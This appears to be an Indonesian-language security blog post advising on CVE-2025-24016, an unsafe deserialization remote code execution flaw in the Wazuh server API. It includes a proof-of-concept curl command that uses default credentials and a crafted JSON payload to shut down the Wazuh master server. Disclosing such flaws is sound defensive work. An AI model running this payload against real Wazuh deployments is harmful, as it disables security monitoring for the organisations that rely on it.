Rachmadi A PrakosoFebruari 2025

CVE-2025–24016: Celah Remote Code Execution Kritis ditemukan pada Wazuh

Sumber Gambar: https://cdn.ariyolo.id/blog/2024/09/wazuh-standard-featured-picture.png

Wazuh adalah platform keamanan yang menyediakan deteksi ancaman, visibility, dan compliance untuk lingkungan IT yang dapat digunakan secara open-source atau gratis, terutama pada blue team cybersecurity.

Baru kali ini, terdapat celah kerentanan berupa unsafe deserialization pada API yang dimiliki oleh server Wazuh, yang mengakibatkan penyerang atau threat actor yang memiliki akses API (terutama pada Wazuh yang terdampak oleh kerentanan ini) dapat menjalankan Remote Command Execution (RCE). Pada saat artikel ini dibuat, kerentanan ini berdampak pada Wazuh versi 4.4.0 hingga 4.9.1.

Proof-of-concept

Dengan asumsi terdapat default credentials pada server API, serangan RCE dapat dilakukan dengan menjalankan perintah berikut yang dapat mematikan master server pada Wazuh.

$ curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" - data '{"__unhandled_exc__":{"__class__": "exit", "__args__": []}}' https://<worker-server>:55000/security/user/authenticate/run_as

Severity (Tingkat kerentanan)

  • Skor: 9.9 (Critical)
  • Metrik CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H

Sumber

Visit our website at https://cyberkarta.com


CVE-2025–24016: Celah Remote Code Execution Kritis ditemukan pada Wazuh was originally published in Cyberkarta on Medium, where people are continuing the conversation by highlighting and responding to this story.

PT Cyberkarta Tugu Teknologi

Platform belajar cyber security bersama komunitas cyber

Copyright © 2025 Cyberkarta